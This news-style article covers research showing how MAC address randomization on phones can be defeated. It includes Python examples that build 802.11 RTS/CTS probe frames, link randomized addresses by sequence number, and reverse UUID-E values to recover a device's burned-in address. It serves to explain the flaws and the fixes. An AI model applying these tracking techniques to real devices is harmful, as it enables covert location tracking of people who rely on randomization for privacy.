Security Flaws in MAC Address Randomization Technique Make iOS, Android Devices Vulnerable to Tracking


Tracking mobile phones has become relatively easy since the advent of smartphones and wireless connectivity, because these devices become traceable as they move across public Wi-Fi networks.

MAC address randomization is a technique that is used to secure mobile devices from being traced.

What MAC address randomization does is replace the unique identifier that makes a phone's wireless hardware recognizable with a randomly generated address, so that anyone logging the addresses seen on a network, or sniffing them over the air, cannot easily follow the same device from place to place.

It is a helpful technique because your smartphone's MAC address is routinely logged by operators of public Wi-Fi, for example at retail outlets, so that returning customers can be recognized the moment they walk in.

The same is done at public wireless hotspots. In the UK, for instance, Transport for London has used this strategy to monitor Tube passengers.

In theory, there is no problem with adopting such practices if the primary goal is to identify customers. However, it becomes a real issue when the data is sold to marketers and ad firms.

But a research report from the US Naval Academy shows that even the MAC address randomization technique is flawed: implementation weaknesses undermine the very purpose of using it.

U.S. Naval Academy researchers identified serious flaws in most Android implementations of MAC randomization, allowing them to defeat the protection on roughly 96 percent of the Android devices they tested.

“First, we show that devices commonly make improper use of randomization by sending wireless frames with the true, global address when they should be using a randomized address,” reads the paper published by the experts.

“We move on to extend the passive identification techniques of Vanhoef et al. to effectively defeat randomization in 96% of Android phones. Finally, we show a method that can be used to track 100% of devices using randomization, regardless of manufacturer, by exploiting a previously unknown flaw in the way existing wireless chipsets handle low-level control frames.”

The experts also analyzed so-called Karma attacks, a method that relies on rogue access points (an Evil AP attack) posing as known and trusted networks.

The researchers also devised a new active method that relies on Request-to-Send (RTS) and Clear-to-Send (CTS) control frames to expose the global MAC address of any device, regardless of vendor.

According to the IEEE 802.11 specification, the RTS and CTS control frames are used to avoid collisions: before a node uses the channel to send data, it transmits an RTS frame to inform other nodes that the channel is about to be reserved. An RTS frame carries both a receiver address (RA) and a transmitter address (TA); a CTS frame carries only a receiver address, which is copied from the TA of the RTS it answers.

The recipient node responds with a CTS frame when it is ready to receive data, and the other stations stay silent for the duration announced in the exchange.

This mechanism can be abused because the reply is generated by the wireless chipset for the device's burned-in address, not only for the randomized address it is currently transmitting with. An attacker sends an RTS frame addressed to a candidate global MAC; if a CTS comes back, the device owning that global MAC has just confirmed it is present, even though its own frames carry a randomized address. Once the global MAC is known, the attacker can re-identify and track the device in the future simply by sending it RTS frames addressed to that global MAC and watching for the CTS.
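The exchange above, as an added simulation that is not code from the paper or from any vendor: it builds byte-accurate 802.11 RTS and CTS control frames (frame control, duration, addresses, CRC-32 FCS), models an unassociated station whose chipset answers RTS frames sent to its global address while it is transmitting with a randomized one, and runs the attacker's probing loop against it. The station model, the attacker address and all MAC addresses are constructed for the example; note that the CTS itself carries no transmitter address, so what the attacker learns is a confirmation of the address it guessed, not a new address read out of the reply. A second station with `answers_global=False` shows the behaviour a firmware fix would need to produce.

```python
import struct
import zlib
from dataclasses import dataclass

# 802.11 frame-control byte 0 for the two control subtypes used by the attack.
# Bit layout (LSB first): protocol version (2 bits), type (2 bits), subtype (4 bits).
RTS_FC = 0xB4  # type 01 (control), subtype 1011 (RTS)
CTS_FC = 0xC4  # type 01 (control), subtype 1100 (CTS)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def fcs(body: bytes) -> bytes:
    # The 802.11 FCS is the same CRC-32 as Ethernet, transmitted least-significant byte first.
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def build_rts(ra: str, ta: str, duration: int = 0) -> bytes:
    """RTS: FC(2) + Duration(2) + RA(6) + TA(6) + FCS(4) = 20 bytes."""
    body = struct.pack("<BBH", RTS_FC, 0x00, duration) + mac_bytes(ra) + mac_bytes(ta)
    return body + fcs(body)


def build_cts(ra: str, duration: int = 0) -> bytes:
    """CTS: FC(2) + Duration(2) + RA(6) + FCS(4) = 14 bytes. There is no transmitter address."""
    body = struct.pack("<BBH", CTS_FC, 0x00, duration) + mac_bytes(ra)
    return body + fcs(body)


def parse_control(frame: bytes):
    """Check the FCS and return (subtype, RA, TA-or-None) for an RTS or CTS frame."""
    body, trailer = frame[:-4], frame[-4:]
    if fcs(body) != trailer:
        raise ValueError("bad FCS")
    fc0 = body[0]
    if ((fc0 >> 2) & 0x03) != 1:
        raise ValueError("not a control frame")
    subtype = fc0 >> 4
    if subtype == 0xB and len(body) == 16:
        return "RTS", mac_str(body[4:10]), mac_str(body[10:16])
    if subtype == 0xC and len(body) == 10:
        return "CTS", mac_str(body[4:10]), None
    raise ValueError(f"unhandled control frame subtype {subtype:#x}")


@dataclass
class Station:
    """Simulated unassociated client: a burned-in global MAC plus the randomized MAC in use."""
    global_mac: str
    current_mac: str
    answers_global: bool = True  # the chipset behaviour the paper exploits (constructed model)

    def handle(self, frame: bytes):
        try:
            kind, ra, ta = parse_control(frame)
        except ValueError:
            return None
        if kind != "RTS":
            return None
        accepted = {self.current_mac}
        if self.answers_global:
            accepted.add(self.global_mac)  # replies although it never transmits as this address
        if ra in accepted:
            return build_cts(ra=ta)  # CTS RA is the RTS transmitter, i.e. the attacker
        return None


def probe(station: Station, candidates, attacker_mac: str):
    """Attacker side: send an RTS to each candidate global MAC, keep those that answer with CTS."""
    confirmed = []
    for cand in candidates:
        reply = station.handle(build_rts(ra=cand, ta=attacker_mac))
        if reply is None:
            continue
        kind, ra, _ = parse_control(reply)
        if kind == "CTS" and ra == attacker_mac:
            confirmed.append(cand)
    return confirmed


if __name__ == "__main__":
    ATTACKER = "02:00:00:aa:bb:cc"  # constructed, locally administered attacker address
    phone = Station(global_mac="00:11:22:33:44:55", current_mac="da:a1:19:0c:4f:21")
    watchlist = ["00:11:22:33:44:55", "00:11:22:33:44:56", "00:11:22:33:44:57"]
    print("flawed chipset confirms:", probe(phone, watchlist, ATTACKER))
    fixed = Station("00:11:22:33:44:55", "da:a1:19:0c:4f:21", answers_global=False)
    print("patched chipset confirms:", probe(fixed, watchlist, ATTACKER))
```

The patched model still answers an RTS sent to the randomized address it is actually using, which is the behaviour the standard needs; what it stops doing is vouching for an address it is not transmitting with. The watchlist stands in for the "sufficiently large database" the researchers describe: the attacker needs candidate global addresses from somewhere (an earlier leak, a vendor OUI block, a previous capture) and the RTS probe turns each candidate into a yes/no presence check.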

The group of experts successfully tested the technique on several models from multiple vendors, including the iPhone 5s, iPhone 6s, iPad Air, Google Pixel, LG Nexus 5X, LG G4 and G5, Motorola Nexus 6, Moto Z Play and OnePlus 3.

MAC address randomization flaws

The experts speculate that RTS/CTS responses are handled inside the 802.11 chipset rather than by the operating system, which means the only way to prevent the attack is a firmware patch that the chipset manufacturers would have to develop and distribute.

“There are multiple scenarios in which a motivated attacker could use this method to violate the privacy of an unsuspecting user. If the global MAC address for a user is ever known, it can then be added to a database for future tracking,” added the researchers. “Conceivably, an adversary with a sufficiently large database and advanced transmission capabilities could render randomization protections moot.”

The experts highlighted the importance of adopting a universal randomization policy with clear requirements for how the protection mechanism must be implemented.

“We propose the following best practices for MAC address randomization. Firstly, mandate a universal randomization policy to be used across the spectra of 802.11 client devices. We have illustrated that when vendors implement unique MAC address randomization schemes it becomes easier to identify and track those devices. A universal policy must include at minimum, rules for randomized MAC address byte structure, 802.11 IE usage, and sequence number behavior,” concluded the experts.
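Two of the points the researchers make, the "improper use" finding (frames sent with the true global address when a randomized one was expected) and the byte-structure and sequence-number rules a universal policy would have to cover, can be checked against a capture with a few lines of code. The following is an added example, not code from the paper: it runs over a constructed list of probe-request records (timestamp, source MAC, 12-bit sequence number), checks each address against the minimal byte-structure rule (locally administered bit set, group bit clear), and links frames from different randomized addresses whose sequence counter keeps running, which is the kind of passive identification the article attributes to Vanhoef et al. The gap and time thresholds are assumptions chosen for the sample data.

```python
# Constructed probe-request records: (seconds since capture start, source MAC, sequence number).
# Not real capture data; the values show one device rotating its randomized address while
# its sequence counter keeps running, then sending a frame with its global address.
PROBES = [
    (0.00, "da:a1:19:0c:4f:21", 100),
    (0.10, "da:a1:19:0c:4f:21", 101),
    (1.20, "6e:3b:07:55:e2:90", 102),   # new randomized MAC, counter continues
    (1.30, "6e:3b:07:55:e2:90", 103),
    (2.50, "00:11:22:33:44:55", 104),   # global (U/L bit clear) address sent mid-burst
    (9.00, "7a:00:ff:12:34:56", 2000),  # a different device: distant counter, later in time
]


def address_bits(mac: str):
    """Return (locally_administered, group) flags from the first octet of the address."""
    first = int(mac.split(":")[0], 16)
    return bool(first & 0x02), bool(first & 0x01)


def check_byte_structure(mac: str):
    """Violations of the minimal byte-structure rule for an address claimed to be randomized."""
    local, group = address_bits(mac)
    problems = []
    if not local:
        problems.append("U/L bit clear: burned-in global address, not a randomized one")
    if group:
        problems.append("I/G bit set: group address is invalid as a transmitter address")
    return problems


def link_by_sequence(records, max_gap=8, max_secs=5.0):
    """Cluster frames whose 12-bit sequence numbers continue across changing source MACs.

    A frame joins an existing chain if it arrives within max_secs of that chain's last
    frame and its sequence number is 1..max_gap ahead (mod 4096); otherwise a new chain
    starts. Each chain is one suspected device; any non-local address in it is a leak of
    the global MAC.
    """
    chains = []
    for ts, mac, seq in sorted(records):
        for chain in chains:
            gap = (seq - chain["last_seq"]) % 4096
            if 0 < gap <= max_gap and ts - chain["last_ts"] <= max_secs:
                chain["last_seq"], chain["last_ts"] = seq, ts
                if mac not in chain["macs"]:
                    chain["macs"].append(mac)
                break
        else:
            chains.append({"last_seq": seq, "last_ts": ts, "macs": [mac]})
    for chain in chains:
        chain["leaked_global"] = [m for m in chain["macs"] if not address_bits(m)[0]]
    return chains


if __name__ == "__main__":
    for chain in link_by_sequence(PROBES):
        print(f"one device behind {chain['macs']}; global leaks: {chain['leaked_global']}")
```

Run on the sample data the first five frames collapse into a single device despite three different source addresses, and the fifth frame hands the tracker that device's global MAC; the sixth frame stays separate because its counter is nowhere near. A policy that required the sequence counter to reset on every address change, and forbade global-address frames while unassociated, would break both links.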

Another important issue is that on a majority of Android devices, MAC address randomization isn’t enabled.

The research report, published on Wednesday, states that the researchers successfully tracked 100% of the devices using randomization, regardless of make and model.

They did so by exploiting a flaw in the way wireless chipsets handle low-level control frames.

Apart from the active Request-to-Send (RTS) attack, the team identified several other deanonymization techniques that also apply to a wide range of mobile phones.

The focus of the study was to analyze iOS and Android devices only.

Every 802.11 network interface in a mobile phone carries a 48-bit layer-2 MAC address, a hardware identifier that is supposed to be globally unique.

The researchers also focused on devices that were not associated with an access point, because that is the state in which randomization is applied: once a device joins a network it uses its unique global MAC address.

Previous studies in this area found a weakness in the Wi-Fi Protected Setup (WPS) protocol that can be used to recover the global MAC address of a device even while it is randomizing.

The technique is called Universally Unique IDentifier-Enrollee (UUID-E) reversal: the UUID-E carried in a device's WPS information element is derived deterministically from its global MAC address, so an attacker who captures it can run the derivation backwards by searching the candidate address space.

The current US Naval Academy study builds on this prior work to focus on randomized MAC address implementations.
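To show why UUID-E reversal works, here is an added example (not code from the paper or from any Wi-Fi stack) of the derivation and its inversion. The hostapd/wpa_supplicant code base derives UUID-E as a SHA-1 based, version-5 style UUID over a fixed 16-byte namespace followed by the MAC address; the namespace bytes below are a placeholder assumption, not the real constant, and the MAC addresses are constructed. Because the input to the hash is just the six address bytes and the first three are a public vendor OUI, inverting it costs at most one pass over the 2^24 addresses in that vendor block, which can be precomputed once into a lookup table; the example builds such a table for a 4096-address slice to keep the run short.

```python
import hashlib
import uuid

# Placeholder namespace (assumption for this example). The real constant is in the hostap
# source; only the structure of the derivation matters for the reversal.
NSID = bytes(range(16))


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def uuid_e_from_mac(mac: str, nsid: bytes = NSID) -> str:
    """Version-5 style UUID: SHA-1(namespace || MAC), truncated to 128 bits,
    with the version and RFC 4122 variant bits set."""
    digest = bytearray(hashlib.sha1(nsid + mac_bytes(mac)).digest()[:16])
    digest[6] = (digest[6] & 0x0F) | 0x50   # version 5
    digest[8] = (digest[8] & 0x3F) | 0x80   # RFC 4122 variant
    return str(uuid.UUID(bytes=bytes(digest)))


def build_table(oui: str, nic_start: int, nic_count: int, nsid: bytes = NSID) -> dict:
    """Precompute UUID-E -> MAC for a slice of one vendor's 2^24 address block.

    nic_start/nic_count select the 24-bit device-specific part; the full block is
    nic_start=0, nic_count=1 << 24, a one-time cost per vendor OUI.
    """
    oui_hex = oui.replace(":", "")
    table = {}
    for nic in range(nic_start, nic_start + nic_count):
        raw = bytes.fromhex(oui_hex + f"{nic:06x}")
        mac = ":".join(f"{b:02x}" for b in raw)
        table[uuid_e_from_mac(mac, nsid)] = mac
    return table


def reverse_uuid_e(uuid_e: str, table: dict):
    """Look a captured UUID-E up in the precomputed table; None if it is outside the slice."""
    return table.get(uuid_e.lower())


if __name__ == "__main__":
    table = build_table("00:11:22", nic_start=0, nic_count=4096)   # constructed OUI
    captured = uuid_e_from_mac("00:11:22:00:0a:bc")                 # as seen in a probe request
    print("captured UUID-E:", captured)
    print("recovered global MAC:", reverse_uuid_e(captured, table))
```

The randomized source address on the probe request does not matter at all here: the WPS element travels with the frame unchanged, so a single captured UUID-E is enough to recover the burned-in address that randomization was meant to hide. This is the "802.11 IE usage" rule in the researchers' proposed policy: a randomized frame must not carry elements derived from the global identity.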

They found that although the Android OS has randomization built in, most Android devices do not actually use it.

This makes tracking those Android devices trivial. According to the researchers, 802.11 chipset and firmware incompatibilities may be the reason it is left disabled.

